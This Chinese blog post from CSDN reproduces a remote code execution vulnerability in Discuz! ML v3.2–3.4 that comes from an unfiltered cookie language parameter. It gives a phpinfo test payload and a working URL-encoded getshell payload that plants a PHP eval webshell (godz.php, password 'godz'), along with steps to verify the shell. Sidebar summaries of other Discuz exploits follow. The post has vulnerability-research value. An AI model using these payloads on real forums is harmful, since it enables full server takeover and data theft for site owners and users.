Discuz Ml v3.x 前台Getshell姿势 Discuz漏洞

最新推荐文章于 2024-05-23 15:06:54 发布
最新推荐文章于 2024-05-23 15:06:54 发布
阅读量6.1k 收藏 5
点赞数 1
分类专栏: WEB 漏洞复现和分析 文章标签: Discuz漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_zzZ/article/details/95912088
版权

Discuz Ml v3.x 前台Getshell姿势

1.漏洞描述

Discuz!ML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台,用于构建像“社交网络”这样的互联网社区。

2019年7月11日, Discuz!ML被发现存在一处远程代码执行漏洞,攻击者通过在请求流量的cookie字段中的language参数处插入构造的payload,进行远程代码执行利用,该漏洞利用方式简单,危害性较大。

2.原理

由于Discuz! ML对于cookie字段的不恰当处理造成的
cookie字段中的language参数未经过滤,直接被拼接写入缓存文件之中,
而缓存文件随后又被加载,从而造成代码执行

3.影响版本

Discuz! ML v.3.4
Discuz! ML v.3.3
Discuz! ML v.3.2

4.利用过程

简而言之,通过cookie传入payload,构造好的payload被写入template文件中:

注意这是国际版的,不是国内的那种,一般要有语言选择的才行,大部分都是国外的论坛
类似于有这种的
在这里插入图片描述

问题出在

XXXX_language=

测试PAYLOAD

    XXXX_language='.phpinfo().';

XXX自己改一下
在这里插入图片描述

GO一下看结果
在这里插入图片描述

4.getshell POC

%27.+file_put_contents%28%27godz.php%27%2Curldecode%28%27%253c%253fphp+%2520eval%28%2524_%2547%2545%2554%255b%2522godz%2522%255d%29%253b%253f%253e%27%29%29.%27

原始的payload

'.+file_put_contents('godz.php',urldecode('<?php  eval($_GET["godz"]);?>')).'

在这里插入图片描述

访问网站生成木马文件,godz.php 密码为godz
验证木马

在这里插入图片描述

请勿用于非法用途

god_Zeo
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
mysql注入反弹_Discuz!x xss反弹后台无防御sql注入getshell(附带exploit)
weixin_29915703的博客
01-28 532
### 简要描述:Discuz!x xss反弹后台无防御sql注入getshell,这里的xss只是做一个药引子,因为xss来自日志功能,然而这个日志功能却又默认关闭的,为了测试我们开启它。这个漏洞应该是所有dz通杀的,我下载了最新版本的所以测试通过......### 详细说明:首先我们开启日志功能,然后存储一个xss看看:测试一个xss页面:[](https://images.seebug.or...
discuz uc.php漏洞利用,Discuz的利用UC_KEY进行getshell
weixin_42357837的博客
03-20 700
### 简要描述:知key得shell。### 详细说明:```$configfile = preg_replace("/define\('UC_API',\s*'.*?'\);/i", "define('UC_API', '".addslashes($UC_API)."');", $configfile);```这句代码是有漏洞的。如果我第一次提交的是```\');phpinfo();```de...
Discuz利用UC_KEY进行前台getshell
aixuan9365的博客
06-02 983
来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0137991.html 先通过uc_key把恶意代码保存在/uc_client/data/cache/badwords.php,然后利用preg_replace() 进行任意代码执行。 先附上来源中的脚本。修改了一些代码。 <?php $timestamp = ti...
Discuz!X ≤3.4 任意文件删除漏洞
最新发布
qq_52627570的博客
05-23 299
在浏览器中输入:http://your ip/install/index.php?在浏览器中输入:http://your ip/robots.txt。数据库服务器选择db,其他不改变,记得输入管理员密码哦。点击进入数据库,在设置->个人资料中随意填写一个信息。建立一个upload.html。在浏览器打开,并上传一个图片。提交后,发现信息已改变。至此,漏洞利用结束。
Discuz uc.key泄露导致代码注入漏洞
weixin_30660027的博客
12-13 348
漏洞描述:在Discuz中,uc_key是UC客户端与服务端通信的通信密钥,discuz中的/api/uc.php存在代码写入漏洞,导致黑客可写入恶意代码获取uckey,最终进入网站后台,造成数据泄漏。您也可以登录官方网站更新到最新版本解决。最近用某云服务器的朋友比较多,都来反馈~这个漏洞,现在把修复方案分享下吧 打开/api/uc.php 第一处修改 if(!API_UPDATEBAD...
Discuz全局变量防御绕过导致代码执行getshell
ADummy的博客
02-05 575
Discuz 7.x/6.x 全局变量防御绕过导致代码执行 by ADummy 0x00利用路线 ​ Discuz任意帖子页面—>cookie注入命令—>命令执行(phpinfo()或eval一句话)—>getshell 0x01漏洞介绍 ​ 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞 ​ 影响版本 Dis
discuz低版本升级到3.2
u010674395的专栏
05-09 798
1、备份程序数据库 2、关闭站点(切记不关闭不会成功的) 3、下载相应编码的3.2程序 4、在网站根目录建立文件夹 old,旧程序除了 data , config, uc_client, uc_server 目录以外的程序移动进入 old目录中; 5、 上传 3.2 程序(压缩包中 upload 目录中的文件), 如上传时候提示覆盖目录,请选择“是”; 6、上传安装包 utility 目
Discuz x3.x插件 签到点击广告领积分3.0.zip
11-16
Discuz x3.x是一款广受欢迎的社区论坛系统,它以其强大的功能和灵活的扩展性赢得了众多用户的青睐。在这个数字化的时代,社区论坛不仅是用户交流的平台,也是商家推广产品和服务的有效渠道。而“签到点击广告领积分...
Discuz7.2版的faq.php SQL注入漏洞分析
10-25
主要介绍了Discuz7.2版的faq.php SQL注入漏洞分析,包含注入代码和源码分析,需要的朋友可以参考下
Discuz漏洞整理.pdf
11-15
Discuz漏洞整理,基本囊括了所有已知discuz漏洞,推荐人群为:渗透测试工程师/安全研究员
discuz漏洞版本.zip_Discuz
09-23
本资料主要关注的是"discuz漏洞版本.zip",其中包含了用于分析低版本Discuz! 安全问题的代码。通过深入研究这些代码,我们可以了解到以往Discuz! 版本中的安全隐患,从而提升我们对Web应用安全的理解。 1. **Discuz...
discuz-getshell-auto-method2:Discuz 全自动GetShell 方法#2
05-11
Discuz 全自动 GetShell 本方法比写 config_ucenter.php 更加稳定,而且不易出错 用法 打开 dzhack.php, 找到 $webshell = '<?php phpinfo(); ?>'; list ($status, $data) = $dz->hack ( 'http://ubuntu64/dz/', 'K856C548X2xaTcDdc248I1pc57gdq4vdL2SdH3ifGd4a0ec6UdcfX0B7m9Ubrcs4', ... ); 先把第一行 $webshell 的内容改了,不需要考虑编码问题, 然后修改 hack 函数的参数,第一个为 discuz 的起始路径,第二行为你找到的 UC_KEY 然后执行 php dzhack.php, 会在 data/client.php 下面生成一个 webshell, ![Sc
gentlexue#POC-3#Discuz 3.4 最新版后台getshell1
07-25
Discuz 3.4 最新版后台getshell详情可以看这篇文章:
智能科技公司网站源码+论坛(Discuz x3.x).zip
08-21
Discuz x3.x整站程序安装教程 一、 将程序包解压后,将web文件夹内的所有文件上传到网站根目录 (不同网站的根目录名称不同,如果亲您不知道请咨询空间提供商) 注意:如果您的空间支持在线解压的话,建议您直接将...
Discuz ML! V3.X代码执行漏洞
cyzCc的博客
02-16 1262
Discuz ML! V3.X存在代码执行漏洞,攻击者通过精心构建的请求报文可以直接执行恶意的PHP代码,进一步可获取整个网站的服务器权限 【安鸾渗透实战平台】 靶场:http://whalwl.site:8042/forum.php 首先先用burp抓包,将抓到的数据包发送到Repeater,构造请求参数 在cookies里我们可以看到“CKxv_2132_language=sc”这个参数,...
Discuz!x3.2-3.4 登陆错误次数永远4次bug修复(高危漏洞
无限星辰的博客
06-30 1019
漏洞详情 在 Discuz! X3.2 Release 20141225 版本以及同期发布的 UCenter 软件中,开发了一个部分生效的 “允许用户登录失败次数” 功能,但此功能未完整开发之后仅仅注释了界面上的功能项,后续版本也没有继续开发,导致部分站点的 login_failedtime 在 UCenter 后台基本设置处保存时被设置成 0 ,而由于不同功能项对 0 的处理方式有差异导致系统内对此情况的处理手段是不记录登录失败次数而在提示信息中固定返回 4 次,导致漏洞发生,所以如果你的网站输错密码不管
漏洞复现-DiscuzX 系列全版本后台SQL注入漏洞
qq_59350385的博客
05-10 1524
目录 环境搭建 (1)源码下载: 漏洞检测 报错注入 写文件 漏洞分析 环境搭建 (1)源码下载: https://search.gitee.com/?skin=rec&type=repository&q=discuz git clonehttp://htts://gite.com/ComsenzDiscuzX.git 放置于web根目录,访问即可进入安装页面 (2)也可搭建vulhub靶场,启动discuz环境 漏洞检测 http://.....
home.php mod spacecp,DiscuzX3后台getshell详细利用方法图解
weixin_39567870的博客
04-04 1445
上班后看到wooyun社区发布了一个discuzx3后台拿shell的方法,随后t00ls的会员也测试了discuz x2.5的后台拿shell方法。好蛋疼的是我测试居然没过,抓到的数据包和给出的案例不一样!!!经过研究发现,步骤错了。。。。用户 ? 用户栏目 ? 栏目分组 ? 提交 ? 抓包 (我就是在这步出错的,一定要提交,不然抓到的数据包不一样)Content-Disposition:fo...
Discuz 3.x 任意文件删除漏洞复现
qq_41048303的博客
12-06 2166
Discuz!X ≤3.4 任意文件删除漏洞 1.漏洞环境 执行docker-compose up -d 启动后,访问http://192.168.1.142/install来安装discuz 2.漏洞复现 访问http://192.168.1.142/robots.txt可见robots.txt是存在的 注册用户hahaha 在个人设置页面找到自己的formhash 带上自己的Cookie、formhash发送如下数据包 查看个人设置页面的出生地 构造upload.ht
discuz3.4!ml.zip
04-28
discuz3.4!ml.zip 是一个与论坛程序 Discuz! 相关的软件包,其中包含多语言支持的文件。Discuz! 是一个开源的 PHP 论坛程序,它允许网站管理员创建和管理论坛,让用户能够在线交流和讨论。该软件包使得 Discuz! 能够支持多种语言,使其在国际化环境下更易于使用。 Discuz! 由北京康盛新创科技有限公司开发,目前已经成为国内知名的论坛程序之一。它提供了丰富的功能和插件,使得管理员可以自定义论坛的外观和功能。同时,它也提供了严格的用户权限管理,保证了论坛的安全性。 discuz3.4!ml.zip 文件的存在,使得 Discuz! 能够支持多语言功能。安装该软件包后,管理员可以选择论坛的语言,在不同的语言环境下使用 Discuz! 让用户更容易地进行讨论和交流。除了支持多语言外,Discuz! 还有大量的插件和模板可用,让管理员可以根据需要进行自定义,打造出符合自己需求的论坛。 综上所述,discuz3.4!ml.zip 是一款非常有用的软件包,为 Discuz! 带来了多语言支持功能,让其在国际化环境下更加适用。Discuz! 作为一款稳定可靠的论坛程序,得到了广泛的应用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值